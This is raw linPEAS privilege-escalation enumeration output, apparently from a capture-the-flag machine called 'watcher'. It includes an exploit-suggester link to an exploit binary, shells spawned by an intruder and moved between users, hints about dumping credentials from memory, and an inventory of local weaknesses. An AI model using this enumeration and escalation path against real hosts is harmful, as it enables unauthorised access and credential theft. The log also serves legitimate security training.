ubuntu=16.04{ntfs-3g:2015.3.14AR.1-1build1},debian=7.0{ntfs-3g:2012.1.15AR.5-2.1+deb7u2},debian=8.0{ntfs-3g:2014.2.15AR.2-1+deb8u2} Download URL: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41356.zip Comments: Distros use own versioning scheme. Manual verification needed. Linux headers must be installed. System must have at least two CPU cores. ╔══════════╣ Executing Linux Exploit Suggester 2 ╚ https://github.com/jondonas/linux-exploit-suggester-2 ╔══════════╣ Protections ═╣ AppArmor enabled? .............. You do not have enough privilege to read the profile set. apparmor module is loaded. ═╣ grsecurity present? ............ grsecurity Not Found ═╣ PaX bins present? .............. PaX Not Found ═╣ Execshield enabled? ............ Execshield Not Found ═╣ SELinux enabled? ............... sestatus Not Found ═╣ Seccomp enabled? ............... disabled ═╣ AppArmor profile? .............. unconfined ═╣ User namespace? ................ enabled ═╣ Cgroup2 enabled? ............... enabled ═╣ Is ASLR enabled? ............... Yes ═╣ Printer? ....................... No ═╣ Is this a virtual machine? ..... Yes (xen) ╔═══════════╗ ═══════════════════════════════════╣ Container ╠═══════════════════════════════════ ╚═══════════╝ ╔══════════╣ Container related tools present /usr/bin/lxc ╔══════════╣ Am I Containered? ╔══════════╣ Container details ═╣ Is this a container? ........... No ═╣ Any running containers? ........ No ╔═══════╗ ═════════════════════════════════════╣ Cloud ╠═════════════════════════════════════ ╚═══════╝ ═╣ Google Cloud Platform? ............... No ═╣ AWS ECS? ............................. No ═╣ AWS EC2? ............................. Yes ═╣ AWS Lambda? .......................... No ╔══════════╣ AWS EC2 Enumeration ami-id: ami-093694236b624e8ad instance-action: none instance-id: i-0a6b1f107393cbf35 instance-life-cycle: on-demand instance-type: t2.nano region: eu-west-1 ══╣ Account Info { "Code" : "Success", "LastUpdated" : "2023-03-15T21:37:53Z", "AccountId" : "739930428441" } ══╣ Network Info Mac: 02:60:de:a6:7c:75/ Owner ID: 739930428441 Public Hostname: Security Groups: AllowEverything Private IPv4s: Subnet IPv4: 10.10.0.0/16 PrivateIPv6s: Subnet IPv6: Public IPv4s: ══╣ IAM Role ══╣ User Data ╔════════════════════════════════════════════════╗ ════════════════╣ Processes, Crons, Timers, Services and Sockets ╠════════════════ ╚════════════════════════════════════════════════╝ ╔══════════╣ Cleaned processes ╚ Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes root 1 0.0 1.8 225344 8980 ? Ss 21:19 0:03 /sbin/init auto automatic-ubiquity noprompt root 414 0.0 3.5 127788 17636 ? S<s 21:19 0:01 /lib/systemd/systemd-journald root 431 0.0 0.3 105904 1872 ? Ss 21:19 0:00 /sbin/lvmetad -f root 442 0.0 1.1 46780 5508 ? Ss 21:19 0:00 /lib/systemd/systemd-udevd systemd+ 590 0.0 0.6 141956 3184 ? Ssl 21:20 0:00 /lib/systemd/systemd-timesyncd └─(Caps) 0x0000000002000000=cap_sys_time systemd+ 711 0.0 0.9 80080 4880 ? Ss 21:20 0:00 /lib/systemd/systemd-networkd └─(Caps) 0x0000000000003c00=cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw systemd+ 728 0.0 0.9 70660 4864 ? Ss 21:20 0:00 /lib/systemd/systemd-resolved root 813 0.1 0.5 637024 2880 ? Ssl 21:20 0:05 /usr/bin/lxcfs /var/lib/lxcfs/ root 820 0.0 1.3 286244 6600 ? Ssl 21:20 0:00 /usr/lib/accountsservice/accounts-daemon[0m root 823 0.0 2.7 169100 13724 ? Ssl 21:20 0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers root 824 0.0 5.2 728300 25812 ? Ssl 21:20 0:00 /usr/bin/amazon-ssm-agent message+ 833 0.0 0.8 50060 4216 ? Ss 21:20 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only └─(Caps) 0x0000000020000000=cap_audit_write root 839 0.0 1.1 62156 5708 ? Ss 21:20 0:00 /lib/systemd/systemd-logind root 840 0.0 0.6 30028 2952 ? Ss 21:20 0:00 /usr/sbin/cron -f root 2174 0.0 0.6 57500 3224 ? S 21:41 0:00 _ /usr/sbin/CRON -f mat 2175 0.0 0.1 4628 760 ? Ss 21:41 0:00 _ /bin/sh -c /home/toby/jobs/cow.sh mat 2176 0.0 0.6 11592 3192 ? S 21:41 0:00 _ /bin/bash /home/toby/jobs/cow.sh mat 2178 0.0 1.0 21232 4960 ? S 21:41 0:00 _ /bin/bash -i root 2359 0.0 0.8 62220 4064 ? S 22:07 0:00 _ sudo -u will /usr/bin/python3 /home/mat/scripts/will_script.py 1 will 2360 0.0 1.9 28540 9424 ? S 22:07 0:00 _ /usr/bin/python3 /home/mat/scripts/will_script.py 1 will 2361 0.0 0.1 4628 900 ? S 22:07 0:00 _ sh -c /bin/bash will 2362 0.0 0.2 11592 1212 ? S 22:07 0:00 _ /bin/bash will 2363 0.0 0.6 11592 3184 ? S 22:07 0:00 _ /bin/bash will 2370 0.0 0.6 11592 3072 ? S 22:08 0:00 _ bash will 2371 0.0 1.9 39084 9720 ? S 22:08 0:00 _ python3 -c import pty;pty.spawn("/bin/bash") will 2372 0.0 1.0 21216 4976 pts/2 Ss 22:08 0:00 _ /bin/bash will 2486 0.1 0.5 5360 2508 pts/2 S+ 22:12 0:00 _ /bin/sh ./linpeas.sh will 5978 0.0 0.1 5360 888 pts/2 S+ 22:20 0:00 _ /bin/sh ./linpeas.sh will 5982 0.0 0.7 38524 3640 pts/2 R+ 22:20 0:00 | _ ps fauxwww will 5981 0.0 0.1 5360 888 pts/2 S+ 22:20 0:00 _ /bin/sh ./linpeas.sh daemon[0m 845 0.0 0.4 28332 2180 ? Ss 21:20 0:00 /usr/sbin/atd -f syslog 850 0.0 0.8 263036 4100 ? Ssl 21:20 0:00 /usr/sbin/rsyslogd -n root 882 0.0 0.4 29148 2064 ? Ss 21:20 0:00 /usr/sbin/vsftpd /etc/vsftpd.conf root 897 0.0 1.3 291456 6648 ? Ssl 21:20 0:00 /usr/lib/policykit-1/polkitd --no-debug root 900 0.0 3.1 185948 15500 ? Ssl 21:20 0:00 /usr/bin/python3 /usr/share/unattended-upgrades/unattended-upgrade-shutdown --wait-for-signal root 913 0.0 0.4 14664 2132 ttyS0 Ss+ 21:20 0:00 /sbin/agetty -o -p -- u --keep-baud 115200,38400,9600 ttyS0 vt220 root 915 0.0 0.3 14888 1624 tty1 Ss+ 21:20 0:00 /sbin/agetty -o -p -- u --noclear tty1 linux root 930 0.0 1.0 72304 5240 ? Ss 21:20 0:00 /usr/sbin/sshd -D root 976 0.0 2.3 329256 11700 ? Ss 21:20 0:00 /usr/sbin/apache2 -k start www-data 983 0.0 2.4 334116 12080 ? S 21:20 0:00 _ /usr/sbin/apache2 -k start www-data 987 67.3 2.7 334116 13292 ? R 21:20 40:25 _ /usr/sbin/apache2 -k start www-data 2053 0.0 0.1 4628 860 ? S 21:36 0:00 | _ sh -c sh www-data 2054 0.0 0.1 4628 824 ? S 21:36 0:00 | _ sh www-data 2059 0.0 1.8 37296 9192 ? S 21:37 0:00 | _ python3 -c import pty;pty.spawn("/bin/bash") www-data 2061 0.0 0.6 18508 3412 pts/1 Ss 21:37 0:00 | _ /bin/bash root 2082 0.0 0.7 60576 3712 pts/1 S 21:38 0:00 | _ sudo -u toby /bin/bash toby 2083 0.0 0.9 19540 4444 pts/1 S+ 21:38 0:00 | _ /bin/bash www-data 988 0.0 1.7 333920 8516 ? S 21:20 0:00 _ /usr/sbin/apache2 -k start www-data 989 0.0 2.5 334124 12304 ? S 21:20 0:00 _ /usr/sbin/apache2 -k start www-data 990 0.0 1.6 333712 8104 ? S 21:20 0:00 _ /usr/sbin/apache2 -k start www-data 2036 0.0 2.6 334116 13140 ? S 21:35 0:00 _ /usr/sbin/apache2 -k start root 1121 0.0 4.5 713184 22392 ? Ssl 21:20 0:00 /usr/lib/lxd/lxd --group lxd --logfile=/var/log/lxd/lxd.log lxd 1292 0.0 0.0 51584 384 ? S 21:20 0:00 dnsmasq --strict-order --bind-interfaces --pid-file=/var/lib/lxd/networks/lxdbr0/dnsmasq.pid --except-interface=lo --interface=lxdbr0 --quiet-dhcp --quiet-dhcp6 --quiet-ra --listen-address=10.14.179.1 --dhcp-no-override --dhcp-authoritative --dhcp-leasefile=/var/lib/lxd/networks/lxdbr0/dnsmasq.leases --dhcp-hostsfile=/var/lib/lxd/networks/lxdbr0/dnsmasq.hosts --dhcp-range 10.14.179.2,10.14.179.254,1h --listen-address=fd42:ee66:e342:a611::1 --enable-ra --dhcp-range ::,constructor:lxdbr0,ra-stateless,ra-names -s lxd -S /lxd/ --conf-file=/var/lib/lxd/networks/lxdbr0/dnsmasq.raw -u lxd └─(Caps) 0x0000000000003000=cap_net_admin,cap_net_raw root 1360 0.0 0.0 1572 48 ? Ss 21:20 0:00 _ /sbin/init root 1688 0.0 0.0 1572 44 ? Ss 21:20 0:00 _ udhcpc -b -R -p /var/run/udhcpc.eth0.pid -i eth0 root 1718 0.0 0.0 1588 60 ? Ss 21:20 0:00 _ /sbin/syslogd -t ╔══════════╣ Binary processes permissions (non 'root root' and not belonging to current user) ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes ╔══════════╣ Files opened by processes belonging to other users ╚ This is usually empty because of the lack of privileges to read other user processes information COMMAND PID TID USER FD TYPE DEVICE SIZE/OFF NODE NAME ╔══════════╣ Processes with credentials in memory (root req) ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#credentials-from-process-memory gdm-password Not Found gnome-keyring-daemon Not Found lightdm Not Found vsftpd process found (dump creds from memory as root) apache2 process found (dump creds from memory as root) sshd Not Found ╔══════════╣ Cron jobs ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#scheduled-cron-jobs /usr/bin/crontab incrontab Not Found -rw-r--r-- 1 root root 761 Dec 3 2020 /etc/crontab /etc/cron.d: total 24 drwxr-xr-x 2 root root 4096 Dec 3 2020 . drwxr-xr-x 95 root root 4096 Dec 12 2020 .. -rw-r--r-- 1 root root 589 Jan 14 2020 mdadm -rw-r--r-- 1 root root 712 Jan 17 2018 php -rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder -rw-r--r-- 1 root root 191 Aug 6 2020 popularity-contest /etc/cron.daily: total 64 drwxr-xr-x 2 root root 4096 Dec 12 2020 . drwxr-xr-x 95 root root 4096 Dec 12 2020 .. -rwxr-xr-x 1 root root 539 Jul 16 2019 apache2 -rwxr-xr-x 1 root root 376 Nov 11 2019 apport -rwxr-xr-x 1 root root 1478 Apr 20 2018 apt-compat -rwxr-xr-x 1 root root 355 Dec 29 2017 bsdmainutils -rwxr-xr-x 1 root root 1176 Nov 2 2017 dpkg -rwxr-xr-x 1 root root 372 Aug 21 2017 logrotate -rwxr-xr-x 1 root root 1065 Apr 7 2018 man-db -rwxr-xr-x 1 root root 539 Jan 14 2020 mdadm -rwxr-xr-x 1 root root 538 Mar 1 2018 mlocate -rwxr-xr-x 1 root root 249 Jan 25 2018 passwd -rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder -rwxr-xr-x 1 root root 3477 Feb 21 2018 popularity-contest -rwxr-xr-x 1 root root 246 Mar 21 2018 ubuntu-advantage-tools -rwxr-xr-x 1 root root 214 Nov 12 2018 update-notifier-common /etc/cron.hourly: total 12 drwxr-xr-x 2 root root 4096 Aug 6 2020 . drwxr-xr-x 95 root root 4096 Dec 12 2020 .. -rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder /etc/cron.monthly: total 12 drwxr-xr-x 2 root root 4096 Aug 6 2020 . drwxr-xr-x 95 root root 4096 Dec 12 2020 .. -rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder /etc/cron.weekly: total 20 drwxr-xr-x 2 root root 4096 Aug 6 2020 . drwxr-xr-x 95 root root 4096 Dec 12 2020 .. -rwxr-xr-x 1 root root 723 Apr 7 2018 man-db -rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder -rwxr-xr-x 1 root root 211 Nov 12 2018 update-notifier-common SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin 17 * * * * root cd / && run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) */1 * * * * mat /home/toby/jobs/cow.sh ╔══════════╣ Systemd PATH ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#systemd-path-relative-paths PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin ╔══════════╣ Analyzing .service files ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#services You can't write on systemd PATH ╔══════════╣ System timers ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers NEXT LEFT LAST PASSED UNIT ACTIVATES Wed 2023-03-15 22:39:00 UTC 17min left Wed 2023-03-15 22:09:12 UTC 12min ago phpsessionclean.timer phpsessionclean.service Thu 2023-03-16 02:49:41 UTC 4h 28min left Wed 2023-03-15 21:20:11 UTC 1h 1min ago motd-news.timer motd-news.service Thu 2023-03-16 06:12:23 UTC 7h left Wed 2023-03-15 21:20:11 UTC 1h 1min ago apt-daily-upgrade.timer apt-daily-upgrade.service Thu 2023-03-16 06:26:32 UTC 8h left Wed 2023-03-15 21:20:11 UTC 1h 1min ago apt-daily.timer apt-daily.service Thu 2023-03-16 21:34:46 UTC 23h left Wed 2023-03-15 21:34:46 UTC 46min ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service Mon 2023-03-20 00:00:00 UTC 4 days left Wed 2023-03-15 21:20:11 UTC 1h 1min ago fstrim.timer fstrim.service n/a n/a n/a n/a snapd.snap-repair.timer snapd.snap-repair.service n/a n/a n/a n/a ureadahead-stop.timer ureadahead-stop.service ╔══════════╣ Analyzing .timer files ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers ╔══════════╣ Analyzing .socket files ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets /etc/systemd/system/sockets.target.wants/uuidd.socket is calling this writable listener: /run/uuidd/request /lib/systemd/system/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket /lib/systemd/system/sockets.target.wants/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket /lib/systemd/system/sockets.target.wants/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log /lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout /lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket /lib/systemd/system/syslog.socket is calling this writable listener: /run/systemd/journal/syslog /lib/systemd/system/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log /lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout /lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket /lib/systemd/system/uuidd.socket is calling this writable listener: /run/uuidd/request ╔══════════╣ Unix Sockets Listening ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets /run/acpid.socket └─(Read Write) /run/dbus/system_bus_socket └─(Read Write) /run/lvm/lvmetad.socket /run/lvm/lvmpolld.socket /run/snapd-snap.socket └─(Read Write) /run/snapd.socket └─(Read Write) /run/systemd/journal/dev-log └─(Read Write) /run/systemd/journal/socket └─(Read Write) /run/systemd/journal/stdout └─(Read Write) /run/systemd/journal/syslog └─(Read Write) /run/systemd/notify └─(Read Write) /run/systemd/private └─(Read Write) /run/udev/control /run/uuidd/request └─(Read Write) /var/lib/lxd/containers/ignite/command /var/lib/lxd/devlxd/sock └─(Read Write) /var/lib/lxd/unix.socket /var/run/dbus/system_bus_socket └─(Read Write) ╔══════════╣ D-Bus config files ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus Possible weak user policy found on /etc/dbus-1/system.d/dnsmasq.conf ( <policy user="dnsmasq">) Possible weak user policy found on /etc/dbus-1/system.d/org.freedesktop.thermald.conf ( <policy group="power">) ╔══════════╣ D-Bus Service Objects list ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus NAME PID PROCESS USER CONNECTION UNIT SESSION DESCRIPTION :1.0 711 systemd-network systemd-network :1.0 systemd-networkd.service - - :1.1 728 systemd-resolve systemd-resolve :1.1 systemd-resolved.service - - :1.2 1 systemd root :1.2 init.scope - - :1.25 9186 busctl will :1.25 cron.service - - :1.3 839 systemd-logind root :1.3 systemd-logind.service - - :1.4 820 accounts-daemon[0m root :1.4 accounts-daemon.service - - :1.5 897 polkitd root :1.5 polkit.service - - :1.7 823 networkd-dispat root :1.7 networkd-dispatcher.se…ce - - :1.9 900 unattended-upgr root :1.9 unattended-upgrades.se…ce - - com.ubuntu.LanguageSelector - - - (activatable) - - com.ubuntu.SoftwareProperties - - - (activatable) - - io.netplan.Netplan - - - (activatable) - - org.freedesktop.Accounts 820 accounts-daemon[0m root :1.4 accounts-daemon.service - - org.freedesktop.DBus 1 systemd root - init.scope - - org.freedesktop.PolicyKit1 897 polkitd root :1.5 polkit.service - - org.freedesktop.hostname1 - - - (activatable) - - org.freedesktop.locale1 - - - (activatable) - - org.freedesktop.login1 839 systemd-logind root :1.3 systemd-logind.service - - org.freedesktop.network1 711 systemd-network systemd-network :1.0 systemd-networkd.service - - org.freedesktop.resolve1 728 systemd-resolve systemd-resolve :1.1 systemd-resolved.service - - org.freedesktop.systemd1 1 systemd root :1.2 init.scope - - org.freedesktop.thermald - - - (activatable) - - org.freedesktop.timedate1 - - - (activatable) - - ╔═════════════════════╗ ══════════════════════════════╣ Network Information ╠══════════════════════════════ ╚═════════════════════╝ ╔══════════╣ Hostname, hosts and DNS watcher 127.0.0.1 localhost 127.0.1.1 watcher ::1 ip6-localhost ip6-loopback fe00::0 ip6-localnet ff00::0 ip6-mcastprefix ff02::1 ip6-allnodes ff02::2 ip6-allrouters nameserver 127.0.0.53 options edns0 search eu-west-1.compute.internal ╔══════════╣ Interfaces # symbolic names for networks, see networks(5) for more information link-local 169.254.0.0 eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 9001 inet 10.10.46.15 netmask 255.255.0.0 broadcast 10.10.255.255 inet6 fe80::60:deff:fea6:7c75 prefixlen 64 scopeid 0x20<link> ether 02:60:de:a6:7c:75 txqueuelen 1000 (Ethernet) RX packets 1810 bytes 955510 (955.5 KB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 1438 bytes 393737 (393.7 KB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536 inet 127.0.0.1 netmask 255.0.0.0 inet6 ::1 prefixlen 128 scopeid 0x10<host> loop txqueuelen 1000 (Local Loopback) RX packets 167 bytes 14734 (14.7 KB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 167 bytes 14734 (14.7 KB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 lxdbr0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 10.14.179.1 netmask 255.255.255.0 broadcast 0.0.0.0 inet6 fe80::10d9:7bff:fea4:d7a6 prefixlen 64 scopeid 0x20<link> inet6 fd42:ee66:e342:a611::1 prefixlen 64 scopeid 0x0<global> ether fe:25:db:5a:44:da txqueuelen 1000 (Ethernet) RX packets 22 bytes 2612 (2.6 KB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 44 bytes 6153 (6.1 KB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 vethV01BP3: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet6 fe80::fc25:dbff:fe5a:44da prefixlen 64 scopeid 0x20<link> ether fe:25:db:5a:44:da txqueuelen 1000 (Ethernet) RX packets 22 bytes 2920 (2.9 KB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 53 bytes 6567 (6.5 KB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 ╔══════════╣ Active Ports ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports tcp 0 0 10.14.179.1:53 0.0.0.0:* LISTEN - tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN - tcp6 0 0 :::80 :::* LISTEN - tcp6 0 0 fd42:ee66:e342:a611::53 :::* LISTEN - tcp6 0 0 fe80::10d9:7bff:fea4:53 :::* LISTEN - tcp6 0 0 :::21 :::* LISTEN - tcp6 0 0 :::22 :::* LISTEN - ╔══════════╣ Can I sniff with tcpdump? ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sniffing You can sniff with tcpdump! ╔═══════════════════╗ ═══════════════════════════════╣ Users Information ╠═══════════════════════════════ ╚═══════════════════╝ ╔══════════╣ My user ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#users uid=1000(will) gid=1000(will) groups=1000(will),4(adm) ╔══════════╣ Do I have PGP keys? /usr/bin/gpg netpgpkeys Not Found netpgp Not Found ╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid ╔══════════╣ Checking sudo tokens ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#reusing-sudo-tokens ptrace protection is enabled (1) gdb wasn't found in PATH, this might still be vulnerable but linpeas won't be able to check it ╔══════════╣ Checking Pkexec policy ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe#pe-method-2 [Configuration] AdminIdentities=unix-user:0 [Configuration] AdminIdentities=unix-group:sudo;unix-group:admin ╔══════════╣ Superusers root:x:0:0:root:/root:/bin/bash ╔══════════╣ Users with console mat:x:1002:1002:,#,,:/home/mat:/bin/bash root:x:0:0:root:/root:/bin/bash toby:x:1003:1003:,,,:/home/toby:/bin/bash will:x:1000:1000:will:/home/will:/bin/bash ╔══════════╣ All users & groups uid=0(root) gid=0(root) groups=0(root) uid=1000(will) gid=1000(will) groups=1000(will),4(adm) uid=1001(ftpuser) gid=1001(ftpuser) groups=1001(ftpuser) uid=1002(mat) gid=1002(mat) groups=1002(mat) uid=1003(toby) gid=1003(toby) groups=1003(toby) uid=100(systemd-network) gid=102(systemd-network) groups=102(systemd-network) uid=101(systemd-resolve) gid=103(systemd-resolve) groups=103(systemd-resolve) uid=102(syslog) gid=106(syslog) groups=106(syslog),4(adm) uid=103(messagebus) gid=107(messagebus) groups=107(messagebus) uid=104(_apt) gid=65534(nogroup) groups=65534(nogroup) uid=105(lxd) gid=65534(nogroup) groups=65534(nogroup) uid=106(uuidd) gid=110(uuidd) groups=110(uuidd) uid=107(dnsmasq) gid=65534(nogroup) groups=65534(nogroup) uid=108(landscape) gid=112(landscape) groups=112(landscape) uid=109(pollinate) gid=1(daemon[0m) groups=1(daemon[0m) uid=10(uucp) gid=10(uucp) groups=10(uucp) uid=110(sshd) gid=65534(nogroup) groups=65534(nogroup) uid=111(ftp) gid=114(ftp) groups=114(ftp) uid=13(proxy) gid=13(proxy) groups=13(proxy) uid=1(daemon[0m) gid=1(daemon[0m) groups=1(daemon[0m) uid=2(bin) gid=2(bin) groups=2(bin) uid=33(www-data) gid=33(www-data) groups=33(www-data) uid=34(backup) gid=34(backup) groups=34(backup) uid=38(list) gid=38(list) groups=38(list) uid=39(irc) gid=39(irc) groups=39(irc) uid=3(sys) gid=3(sys) groups=3(sys) uid=41(gnats) gid=41(gnats) groups=41(gnats) uid=4(sync) gid=65534(nogroup) groups=65534(nogroup) uid=5(games) gid=60(games) groups=60(games) uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup) uid=6(man) gid=12(man) groups=12(man) uid=7(lp) gid=7(lp) groups=7(lp) uid=8(mail) gid=8(mail) groups=8(mail) uid=9(news) gid=9(news) groups=9(news) ╔══════════╣ Login now 22:22:30 up 1:02, 0 users, load average: 3.94, 3.18, 2.06 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT ╔══════════╣ Last logons reboot system boot Thu Dec 3 02:15:17 2020 - Thu Dec 3 02:28:07 2020 (00:12) 0.0.0.0 reboot system boot Thu Dec 3 02:13:28 2020 - Thu Dec 3 02:28:07 2020 (00:14) 0.0.0.0 will tty1 Thu Dec 3 02:12:09 2020 - down (00:01) 0.0.0.0 reboot system boot Thu Dec 3 02:10:54 2020 - Thu Dec 3 02:13:20 2020 (00:02) 0.0.0.0 will pts/0 Thu Dec 3 01:38:38 2020 - Thu Dec 3 02:10:09 2020 (00:31) 192.168.153.128 will tty1 Thu Dec 3 01:36:11 2020 - down (00:33) 0.0.0.0 reboot system boot Thu Dec 3 01:35:15 2020 - Thu Dec 3 02:10:09 2020 (00:34) 0.0.0.0 reboot system boot Thu Dec 3 01:34:30 2020 - Thu Dec 3 01:35:01 2020 (00:00) 0.0.0.0 wtmp begins Thu Dec 3 01:34:30 2020 ╔══════════╣ Last time logon each user Username Port From Latest root tty1 Thu Dec 3 03:25:38 +0000 2020 will tty1 Sat Dec 12 15:26:04 +0000 2020 mat pts/1 192.168.153.128 Thu Dec 3 02:48:57 +0000 2020 toby pts/1 192.168.153.128 Thu Dec 3 02:40:13 +0000 2020 ╔══════════╣ Do not forget to test 'su' as any other user with shell: without password and with their names as password (I can't do it...) ╔══════════╣ Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!! ╔══════════════════════╗ ═════════════════════════════╣ Software Information ╠═════════════════════════════ ╚══════════════════════╝ ╔══════════╣ Useful software /usr/bin/base64 /usr/bin/curl /usr/bin/lxc /bin/nc /bin/netcat /usr/bin/perl /usr/bin/php /bin/ping /usr/bin/python3 /usr/bin/python3.6 /usr/bin/sudo /usr/bin/wget ╔══════════╣ Installed Compilers /usr/share/gcc-8 ╔══════════╣ Searching mysql credentials and exec ╔══════════╣ Analyzing Apache-Nginx Files (limit 70) Apache version: Server version: Apache/2.4.29 (Ubuntu) Server built: 2020-08-12T21:33:25 httpd Not Found Nginx version: nginx Not Found /etc/apache2/mods-available/php7.2.conf-<FilesMatch ".+\.ph(ar|p|tml)$"> /etc/apache2/mods-available/php7.2.conf: SetHandler application/x-httpd-php -- /etc/apache2/mods-available/php7.2.conf-<FilesMatch ".+\.phps$"> /etc/apache2/mods-available/php7.2.conf: SetHandler application/x-httpd-php-source -- /etc/apache2/mods-enabled/php7.2.conf-<FilesMatch ".+\.ph(ar|p|tml)$"> /etc/apache2/mods-enabled/php7.2.conf: SetHandler application/x-httpd-php -- /etc/apache2/mods-enabled/php7.2.conf-<FilesMatch ".+\.phps$"> /etc/apache2/mods-enabled/php7.2.conf: SetHandler application/x-httpd-php-source ══╣ PHP exec extensions drwxr-xr-x 2 root root 4096 Dec 3 2020 /etc/apache2/sites-enabled drwxr-xr-x 2 root root 4096 Dec 3 2020 /etc/apache2/sites-enabled lrwxrwxrwx 1 root root 35 Dec 3 2020 /etc/apache2/sites-enabled/000-default.conf -> ../sites-available/000-default.conf <VirtualHost *:80> ServerAdmin webmaster@localhost DocumentRoot /var/www/html ErrorLog ${APACHE_LOG_DIR}/error.log CustomLog ${APACHE_LOG_DIR}/access.log combined </VirtualHost> <Directory /var/www/html> Options Indexes FollowSymLinks AllowOverride All Require all granted </Directory> -rw-r--r-- 1 root root 1451 Dec 3 2020 /etc/apache2/sites-available/000-default.conf <VirtualHost *:80> ServerAdmin webmaster@localhost DocumentRoot /var/www/html ErrorLog ${APACHE_LOG_DIR}/error.log CustomLog ${APACHE_LOG_DIR}/access.log combined </VirtualHost> <Directory /var/www/html> Options Indexes FollowSymLinks AllowOverride All Require all granted </Directory> lrwxrwxrwx 1 root root 35 Dec 3 2020 /etc/apache2/sites-enabled/000-default.conf -> ../sites-available/000-default.conf <VirtualHost *:80> ServerAdmin webmaster@localhost DocumentRoot /var/www/html ErrorLog ${APACHE_LOG_DIR}/error.log CustomLog ${APACHE_LOG_DIR}/access.log combined </VirtualHost> <Directory /var/www/html> Options Indexes FollowSymLinks AllowOverride All Require all granted </Directory> -rw-r--r-- 1 root root 71817 Oct 7 2020 /etc/php/7.2/apache2/php.ini allow_url_fopen = On allow_url_include = Off odbc.allow_persistent = On ibase.allow_persistent = 1 mysqli.allow_persistent = On pgsql.allow_persistent = On -rw-r--r-- 1 root root 71429 Oct 7 2020 /etc/php/7.2/cli/php.ini allow_url_fopen = On allow_url_include = Off odbc.allow_persistent = On ibase.allow_persistent = 1 mysqli.allow_persistent = On pgsql.allow_persistent = On ╔══════════╣ Analyzing Rsync Files (limit 70) -rw-r--r-- 1 root root 1044 Feb 14 2020 /usr/share/doc/rsync/examples/rsyncd.conf [ftp] comment = public archive path = /var/www/pub use chroot = yes lock file = /var/lock/rsyncd read only = yes list = yes uid = nobody gid = nogroup strict modes = yes ignore errors = no ignore nonreadable = yes transfer logging = no timeout = 600 refuse options = checksum dry-run dont compress = *.gz *.tgz *.zip *.z *.rpm *.deb *.iso *.bz2 *.tbz ╔══════════╣ Analyzing Ldap Files (limit 70) The password hash is from the {SSHA} to 'structural' drwxr-xr-x 2 root root 4096 Dec 3 2020 /etc/ldap ╔══════════╣ Searching ssl/ssh files PermitRootLogin yes ChallengeResponseAuthentication no UsePAM yes PasswordAuthentication yes ══╣ Some certificates were found (out limited): /etc/pollinate/entropy.ubuntu.com.pem /var/lib/lxd/server.crt 2486PSTORAGE_CERTSBIN ══╣ Some home ssh config file was found /usr/share/openssh/sshd_config ChallengeResponseAuthentication no UsePAM yes X11Forwarding yes 